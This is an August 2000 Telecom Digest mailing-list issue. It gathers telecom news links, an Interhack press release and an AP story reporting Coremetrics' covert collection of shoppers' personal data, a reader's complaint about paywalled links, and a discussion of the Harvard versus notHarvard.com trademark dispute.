Date: 2 Aug 2000 06:15:17 -0400 Message-ID: <20000802101517.9555.qmail@xuxa.iecc.com> From: owner-telecom-digest@telecom-digest.org (Telecom Digest) To: telecom-digest@telecom-digest.org Subject: Telecom Digest V2000 #4 Reply-To: editor@telecom-digest.org Sender: owner-telecom-digest@telecom-digest.org Errors-To: owner-telecom-digest@telecom-digest.org Precedence: bulk X-UIDL: 925c07e129d38d6615b8be890eff325f Status: RO X-Status: Telecom Digest Wednesday, August 2 2000 Volume 2000 : Number 004 In this issue: FCC Delays Airwave Auction For Wireless Strike Could Affect Verizon Customers CIOs warned of cell phone risks Taking a Bold Step Forward in Privacy Invasion Net marketing firm receiving personal information ICB "free" articles in Telecom Digest Re: internet domain names.. cybersquatting? WSJ clip ---------------------------------------------------------------------- Date: 2 Aug 2000 00:15:26 -0400 From: Monty Solomon Subject: FCC Delays Airwave Auction For Wireless FCC Delays Airwave Auction For Wireless (08/01/00, 3:35 p.m. ET) By Mary Mosquera, TechWeb News The Federal Communications Commission postponed a sale of radio spectrum eagerly anticipated by wireless operators to increase capacity and spur high-speed and next generation Internet rollout. http://www.techweb.com/wire/story/TWB20000801S0009 - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ Date: 2 Aug 2000 00:16:05 -0400 From: Monty Solomon Subject: Strike Could Affect Verizon Customers Strike Could Affect Verizon Customers (08/01/00, 3:03 p.m. ET) By Kim Renay Anderson, TechWeb News A possible strike of 85,000 East Coast telephone workers against Verizon Communications this weekend could affect business and consumer users of its voice and data services. http://www.techweb.com/wire/story/TWB20000801S0007 - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ Date: 2 Aug 2000 00:47:19 -0400 From: Monty Solomon Subject: CIOs warned of cell phone risks CIOs warned of cell phone risks Corporate liability an issue, researcher says By Bob Brewin and Jennifer DiSabatino (Jul. 31, 2000) CIOs need to ensure that their companies' employees operate cell phones and other wireless devices in a manner that reduces health risks associated with radiation - or face the legal consequences. http://www.computerworld.com/cwi/Printer_Friendly_Version/frame/0,1212,NAV47_STO47766-,00.html - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ Date: 2 Aug 2000 00:56:08 -0400 From: Monty Solomon Subject: Taking a Bold Step Forward in Privacy Invasion http://www.interhack.net/news/cm-tracking.html FOR IMMEDIATE RELEASE Taking a Bold Step Forward in Privacy Invasion Interhack Corporation's Internet Privacy Project has yielded shocking results that reveal how marketers' tracking of Internet users has moved well beyond "impersonal" data collection. We reveal how the Coremetrics system can build detailed dossiers of unsuspecting Web surfers that include names, physical addresses, telephone numbers, email addresses, and other personally-identifiable information. Among the sites that use Coremetrics are four that specifically state that they do not share personal information with third parties, namely Toys "R" Us (NYSE:TOY) sites toysrus.com and babiesrus.com, as well as Lucy.com, and Fusion.com. On today's Internet, aggregation of such data is not only inconvenient, but it can place unsuspecting Web surfers -- including children -- at risk of becoming victims of real-world crimes including stalking and identity theft. Mene Mene Tekel Parsin "Perhaps consumers, the US Federal Trade Commission, and our friends in Europe should be more concerned about what Web-based vendors are actually doing online than what they admit to doing," said Matt Curtin, Interhack's founder. He added, "The industry does not want to be regulated; it wants to do whatever it can get away with. Today we tell the industry that when it comes to invading our privacy, it will get away with nothing." Leaks Not Accidental; Formatted for Database Entry These "leaks" to a third party data collection facility are not accidental or due to bad web site design or implementation. Using JavaScript, web bugs, and cookies in concert, an increasing number of sites are taking information that users report to them during the course of making a purchase and cause the users' browsers to send the information to an Internet-based data collection facility in a standardized format for entry into a database. The data collection facility is part of a service offered by Coremetrics to observe and to track the behavior of users as they use a vendor's Web site. Though Coremetrics' Web site contains a rather complete and lucid description of what they are doing and how users can "opt out" of the system, not all sites inform their users that information expected to be confidential will be reported to Coremetrics. Some of those that do bury the information deep within a bunch of legal gobbledygook. In any case, many users are unknowingly providing all of the details of their Web-based purchases (except for the credit card number used for the purchase) to a third party that saves the information and makes a business of analyzing it. Furthermore, "opt out" systems fail, as we have previously described in the technical reports DoubleClick Opt Out Protocol Failure == Opt In and Opting In, By Accident, available online at http://www.interhack.net/pubs/dc-proto-fail/ and http://www.interhack.n! et/pubs/netscape-doubleclick/, respectively. System Designed To Resist Discovery Several steps to avoid detection have been taken. The information is sent to Coremetrics by using a web bug -- a tiny invisible image that serves no purpose but to track Web surfers. The JavaScript code used to implant the web bugs and to format the data for submission to Coremetrics is obfuscated -- intentionally made difficult to read by human programmers. Finally, in typical cases where personally-identifiable information is being uploaded, the connection to Coremetrics is encrypted, preventing packet sniffers and privacy-defending systems from being able to read what is being sent. System Likely Tracks Children Online Perhaps most alarming of all is that at least one site using this technology is an online toy store. How can such a site tell the difference between an adult browsing the site and a child? The technology itself does not distinguish among users. A parent who makes a purchase on such a Web site will make the Coremetrics database aware of his name, address, and phone number. Subsequent visits to the site -- including visits by children from that same computer (and the same browser) -- will be recorded and associated with the parent's profile. Or if an adult chooses to have a gift shipped directly to a child, entering the child's name and address in the "ship to" field of the order, that information will be sent to Coremetrics. System Tracks Users as They Move from Site to Site This system works such that instead of knowing everything about users and what they do on a particular site, the database can know everything about all users and what they do on every Coremetrics-enabled site. The more sites that use Coremetrics' tracking software, the greater the privacy invasion would become. Whether this is actually taking place, we cannot say -- there is no way to tell the difference between what is technically possible and what is actually happening without examining Coremetrics' data handling practices and auditing the code regularly. Tracking is not limited to purchases. Very detailed profiles are built as users browse Coremetrics-enabled pages, including products examined but not purchased. At the point where a user gives his name to the vendor to make a purchase, that name (as well as how much was spent and other information) is associated with the profile. Sites Using System Violate Their Own Privacy Policies Sites toysrus.com, babiesrus.com, lucy.com, and fusion.com claim not to send information about users to third parties. For example, babiesrus.com displays this text at the bottom of the page during the checkout process: Babiesrus.com keeps your personal information completely confidential. Click here to learn how our site is 100% safe and secure. Following that link will take the user to a page that says: About SSL Encryption The Login, My Account, and Checkout areas of the site are fully secured using a technology called Secure Socket Layer (SSL). SSL Encryption ensures that your credit card number and personal data are always sent over the Internet safely. The information is encoded on your computer before it is sent, and then decoded on the our site's server. Furthermore, all personal data (such as mailing addresses, e-mail and billing information) is stored on a highly secured server within the data center. What it doesn't tell you is that an encrypted connection is also being made to data.coremetrics.com that includes all of that personal data except the credit card number itself. Failing to advise site visitors that Coremetrics is watching them results in visitors having no way to know that the monitoring technology is even being deployed. At the very least, it is interesting to note that the sites that do not reveal their connection with Coremetrics do so against Coremetrics' advice. Coremetrics describes what it does and the principles that guide it on its privacy page at http://www.coremetrics.com/privacy.html. We encourage everyone to take note of this issue and become fully informed by seeing what all parties have to say. It is our belief that every Web user should know exactly what is being done with information about him and use that knowledge to avoid any unnecessary exposure to unpleasant surprises later. Coremetrics and some sites that use its service, namely lucy.com and fusion.com, are licensees of the TRUSTe symbol, used to build consumer confidence! You'll be hearing more from us on this topic. Complete details, including some defense mechanisms, are available in the Interhack Technical Report Getting to Know You (Intimately): Surreptitious Privacy Invasion on the E-Commerce Web, online at http://www.interhack.net/pubs/intimately/. About Interhack Corporation Interhack Corporation is a provider of services and tools for building the Internet with security and privacy in mind. Based in Columbus, Ohio, Interhack serves clients all across North America, helping them to determine compliance to security and privacy policy, in addition to assistance in all aspects of design, development, and deployment of network-based systems. Interhack Corporation can be found on the Web at http://www.interhack.net/. The Interhack Privacy Project page is at http://www.interhack.net/projects/privacy/. Media contact: Matt Curtin, +1 614 206 3413, . ### - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ Date: 2 Aug 2000 00:57:53 -0400 From: Monty Solomon Subject: Net marketing firm receiving personal information Net marketing firm receiving personal information By The Associated Press Special to CNET News.com July 31, 2000, 10:20 p.m. PT WASHINGTON--An Internet marketing company is secretly receiving names and addresses of customers visiting some popular e-commerce sites, which one privacy group called "unforgivable." A security and privacy firm that does risk assessments for Internet retailers has found that four retailers are forwarding the personally identifiable information of customers to another firm, thereby violating the retailers' stated privacy policies. http://news.cnet.com/news/0-1005-200-2403836.html - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ Date: 2 Aug 2000 01:09:10 -0400 From: Joseph Singer Subject: ICB "free" articles in Telecom Digest I do appreciate Judith Oppenheimer's contribution of articles to the digest, but every "free" article that I clicked on in both of her submissions in the latest digest were met with: The page you requested is available only to Registered Users. If you are already registered log in now, if not Register here. User name Password If the article in the digest has an "F" next to it and you have indicated in your article that it is free to view why am I met with the above stuff?? - --------------------------------------------------------------------------- Joseph Singer Seattle, Washington USA [ICQ pgr] +1 206 405 2052 [voice mail] +1 206 493 0706 [FAX] - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ Date: 2 Aug 2000 01:23:12 -0400 From: "Peter F. Dubuque" Subject: Re: internet domain names.. cybersquatting? WSJ clip In article , danny burstein wrote: > Similarly, there's an AP story from this afternon about Harvard > University: > BOSTON (AP) -- Harvard University is suing the Internet startup > notHarvard.com for trademark violations, saying the online company is > unlawfully exploiting the lucrative Ivy League name for financial gain. > The suit, filed Monday in federal court, seeks $75,000 in damages from > notHarvard.com... > Yes. That's "notharvard.com" [Disclaimer 1: I am a current employee of Harvard University, but I'm not writing in any official capacity. These are solely my own opinions.] [Disclaimer 2: I am not a lawyer.] Actually, notharvard.com sued Harvard University first, last week, preemptively seeking a ruling that the notharvard.com name didn't infringe upon Harvard's trademark. Apparently, management at notharvard.com felt that the potential for a future lawsuit over the name was hurting relations with prospective affiliates and investors, and wanted a ruling up front before proceeding. Harvard's reaction should be entirely expected, since Harvard has to defend its trademark against such challenges or risk losing it. $75K is a token amount to cover things like legal costs and time spent by counsel...peanuts to a dot.com with tens of millions of dollars in venture capital. I've heard of plenty of cases where nasty big businesses stole domain names away from innocent people under threat of legal force. (Two friends of mine who operated a BBS named after a hundred-year-old comic strip lost their domain name to a small Midwestern chain of furniture stores who wanted to put up a website.) This isn't a case like that; NotHarvard.com deliberately chose to use the name of a 364-year-old world-famous university. Nor does it fall into the xxxsucks.com category of domain names, where a trademark is used in a negative but not competitive way. Instead, NotHarvard.com is a for-profit, commercial venture seeking to do business in the realm of education. The "Not" is a semantic game. I don't know NotHarvard's reasons for choosing the name they did. Perhaps they wish to contrast their free services with Harvard's $30K+ annual tuition. Or perhaps they want to showcase the novelty of their approach while suggesting that what they offer is on a par with one of the world's leading universities. But whatever their motivation, Harvard owns the trademark on its name in the realm of education, and everybody knows it. If a new software company named itself NotMicrosoft, or a new TV network called itself NotCNN, the owners of the original names would sue and win. And rightly so. They say "how can we be infringing on Harvard's trademark if in our very name we say we're not Harvard?" But if they freely admit they're not Harvard, why use Harvard's name at all instead of choosing one that is unequivocally their own? - -- Peter F. Dubuque - peterd@shore.net - Enemy of Reason(TM) O- - -- The Telecom Digest is currently robomoderated. Please mail messages to editor@telecom-digest.org. ------------------------------ End of Telecom Digest V2000 #4 ******************************